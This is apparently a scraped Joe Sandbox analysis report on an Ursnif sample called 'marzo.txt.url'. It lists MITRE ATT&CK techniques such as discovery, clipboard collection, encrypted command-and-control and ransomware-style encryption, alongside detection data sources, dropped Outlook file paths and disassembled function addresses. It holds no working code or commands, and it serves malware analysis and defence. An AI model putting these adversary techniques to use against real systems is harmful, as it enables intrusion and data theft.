Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report marzo.txt.url

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Ursnif

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_13929_20386-20230315T1230440507-6104.etl

C:\Users\user\AppData\Roaming\Microsoft\Outlook\NoEmail.xml

C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Windows Analysis Report
marzo.txt.url

Function 02B81508 Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Function 02B83BD3 Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Function 02B8421F Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 02B8213E Relevance: 6.0, APIs: 4, Instructions: 44
sleepthreadtimeCOMMON

Function 02B83CE0 Relevance: 37.7, APIs: 25, Instructions: 222
memorystringCOMMON

Function 02B87B83 Relevance: 19.6, APIs: 13, Instructions: 126
networkstringCOMMON

Function 02B87FC5 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Function 02B86815 Relevance: 16.7, APIs: 11, Instructions: 151
timememoryCOMMON

Function 02B8415A Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 02B84BE7 Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Function 02B6003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 02B85E40 Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 02B86675 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Function 02B851D8 Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Function 02B82523 Relevance: 7.7, APIs: 5, Instructions: 161
memoryCOMMON

Function 02B87040 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Function 02B85364 Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Function 02B85251 Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Function 02B812C6 Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Function 02B8790B Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 02B8472F Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Function 02B85006 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Function 02B82839 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 02B861DA Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 02B833F1 Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Function 02B85063 Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Function 02B81D8A Relevance: 12.3, APIs: 8, Instructions: 258
memoryCOMMONCrypto

Function 02B854D8 Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Function 02B830D5 Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Function 02B816DF Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Function 02B88551 Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Function 02B8832C Relevance: .1, Instructions: 77
COMMONCrypto

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre